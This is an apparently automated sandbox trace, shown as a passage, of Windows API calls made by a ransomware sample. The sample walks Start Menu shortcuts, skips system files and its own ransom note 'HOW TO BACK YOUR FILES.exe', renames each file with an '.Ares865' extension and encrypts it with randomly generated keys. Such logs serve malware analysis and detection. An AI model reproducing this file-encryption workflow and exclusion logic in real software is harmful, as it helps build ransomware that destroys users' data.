-1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="aoldtz.exe") returned 1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2=".") returned 1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="..") returned 1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="windows") returned -1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="bootmgr") returned 1 [0068.205] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="temp") returned -1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="pagefile.sys") returned -1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="boot") returned 1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="ids.txt") returned -1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="ntuser.dat") returned -1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="perflogs") returned -1 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2="MSBuild") returned -1 [0068.206] lstrlenW (lpString="displayswitch.lnk") returned 17 [0068.206] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Desktop.ini") returned 62 [0068.206] lstrcpyW (in: lpString1=0x2cce466, lpString2="displayswitch.lnk" | out: lpString1="displayswitch.lnk") returned="displayswitch.lnk" [0068.206] lstrlenW (lpString="displayswitch.lnk") returned 17 [0068.206] lstrlenW (lpString="Ares865") returned 7 [0068.206] lstrcmpiW (lpString1="tch.lnk", lpString2="Ares865") returned 1 [0068.206] lstrlenW (lpString=".dll") returned 4 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2=".dll") returned 1 [0068.206] lstrlenW (lpString=".lnk") returned 4 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2=".lnk") returned 1 [0068.206] lstrlenW (lpString=".ini") returned 4 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2=".ini") returned 1 [0068.206] lstrlenW (lpString=".sys") returned 4 [0068.206] lstrcmpiW (lpString1="displayswitch.lnk", lpString2=".sys") returned 1 [0068.206] lstrlenW (lpString="displayswitch.lnk") returned 17 [0068.206] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.Ares865") returned 76 [0068.206] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\displayswitch.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\displayswitch.lnk.ares865"), dwFlags=0x1) returned 1 [0068.215] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\displayswitch.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.215] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1266) returned 1 [0068.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.216] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.217] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x12c [0068.217] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0068.217] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0068.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0068.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.218] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.218] CloseHandle (hObject=0x12c) returned 1 [0068.218] CloseHandle (hObject=0x15c) returned 1 [0068.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.220] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bbcba20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0068.220] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0068.220] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c2bb60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x80c2bb60, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x8246bb80, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Math Input Panel.lnk", cAlternateFileName="MATHIN~1.LNK")) returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="aoldtz.exe") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2=".") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="..") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="windows") returned -1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="bootmgr") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="temp") returned -1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="pagefile.sys") returned -1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="boot") returned 1 [0068.220] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="ids.txt") returned 1 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="ntuser.dat") returned -1 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="perflogs") returned -1 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2="MSBuild") returned -1 [0068.221] lstrlenW (lpString="Math Input Panel.lnk") returned 20 [0068.221] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\displayswitch.lnk") returned 68 [0068.221] lstrcpyW (in: lpString1=0x2cce466, lpString2="Math Input Panel.lnk" | out: lpString1="Math Input Panel.lnk") returned="Math Input Panel.lnk" [0068.221] lstrlenW (lpString="Math Input Panel.lnk") returned 20 [0068.221] lstrlenW (lpString="Ares865") returned 7 [0068.221] lstrcmpiW (lpString1="nel.lnk", lpString2="Ares865") returned 1 [0068.221] lstrlenW (lpString=".dll") returned 4 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2=".dll") returned 1 [0068.221] lstrlenW (lpString=".lnk") returned 4 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2=".lnk") returned 1 [0068.221] lstrlenW (lpString=".ini") returned 4 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2=".ini") returned 1 [0068.221] lstrlenW (lpString=".sys") returned 4 [0068.221] lstrcmpiW (lpString1="Math Input Panel.lnk", lpString2=".sys") returned 1 [0068.221] lstrlenW (lpString="Math Input Panel.lnk") returned 20 [0068.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.Ares865") returned 79 [0068.221] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\math input panel.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\math input panel.lnk.ares865"), dwFlags=0x1) returned 1 [0068.222] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\math input panel.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.222] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1364) returned 1 [0068.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.223] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.224] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x154 [0068.225] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x190000 [0068.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.227] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.227] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.227] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.227] CloseHandle (hObject=0x154) returned 1 [0068.227] CloseHandle (hObject=0x15c) returned 1 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.227] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.228] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c77e20, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x80c77e20, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x80c77e20, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mobility Center.lnk", cAlternateFileName="MOBILI~1.LNK")) returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="aoldtz.exe") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2=".") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="..") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="windows") returned -1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="bootmgr") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="temp") returned -1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="pagefile.sys") returned -1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="boot") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="ids.txt") returned 1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="ntuser.dat") returned -1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="perflogs") returned -1 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2="MSBuild") returned -1 [0068.228] lstrlenW (lpString="Mobility Center.lnk") returned 19 [0068.228] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk") returned 71 [0068.228] lstrcpyW (in: lpString1=0x2cce466, lpString2="Mobility Center.lnk" | out: lpString1="Mobility Center.lnk") returned="Mobility Center.lnk" [0068.228] lstrlenW (lpString="Mobility Center.lnk") returned 19 [0068.228] lstrlenW (lpString="Ares865") returned 7 [0068.228] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0068.228] lstrlenW (lpString=".dll") returned 4 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2=".dll") returned 1 [0068.228] lstrlenW (lpString=".lnk") returned 4 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2=".lnk") returned 1 [0068.228] lstrlenW (lpString=".ini") returned 4 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2=".ini") returned 1 [0068.228] lstrlenW (lpString=".sys") returned 4 [0068.228] lstrcmpiW (lpString1="Mobility Center.lnk", lpString2=".sys") returned 1 [0068.228] lstrlenW (lpString="Mobility Center.lnk") returned 19 [0068.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.Ares865") returned 78 [0068.229] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\mobility center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\mobility center.lnk.ares865"), dwFlags=0x1) returned 1 [0068.230] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\mobility center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.230] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1238) returned 1 [0068.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.231] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x154 [0068.232] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0068.233] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.234] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.234] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.234] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.235] CloseHandle (hObject=0x154) returned 1 [0068.235] CloseHandle (hObject=0x15c) returned 1 [0068.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.235] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80afb060, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x80afb060, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x80afb060, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetworkProjection.lnk", cAlternateFileName="NETWOR~1.LNK")) returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="aoldtz.exe") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2=".") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="..") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="windows") returned -1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="bootmgr") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="temp") returned -1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="pagefile.sys") returned -1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="boot") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="ids.txt") returned 1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="ntuser.dat") returned -1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="perflogs") returned -1 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2="MSBuild") returned 1 [0068.235] lstrlenW (lpString="NetworkProjection.lnk") returned 21 [0068.235] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk") returned 70 [0068.235] lstrcpyW (in: lpString1=0x2cce466, lpString2="NetworkProjection.lnk" | out: lpString1="NetworkProjection.lnk") returned="NetworkProjection.lnk" [0068.235] lstrlenW (lpString="NetworkProjection.lnk") returned 21 [0068.235] lstrlenW (lpString="Ares865") returned 7 [0068.235] lstrcmpiW (lpString1="ion.lnk", lpString2="Ares865") returned 1 [0068.235] lstrlenW (lpString=".dll") returned 4 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2=".dll") returned 1 [0068.235] lstrlenW (lpString=".lnk") returned 4 [0068.235] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2=".lnk") returned 1 [0068.235] lstrlenW (lpString=".ini") returned 4 [0068.236] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2=".ini") returned 1 [0068.236] lstrlenW (lpString=".sys") returned 4 [0068.236] lstrcmpiW (lpString1="NetworkProjection.lnk", lpString2=".sys") returned 1 [0068.236] lstrlenW (lpString="NetworkProjection.lnk") returned 21 [0068.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.Ares865") returned 80 [0068.236] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\networkprojection.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\networkprojection.lnk.ares865"), dwFlags=0x1) returned 1 [0068.237] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\networkprojection.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.237] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1242) returned 1 [0068.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.238] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0068.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.239] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x12c [0068.240] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0068.241] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0068.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0068.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0068.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.242] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0068.242] 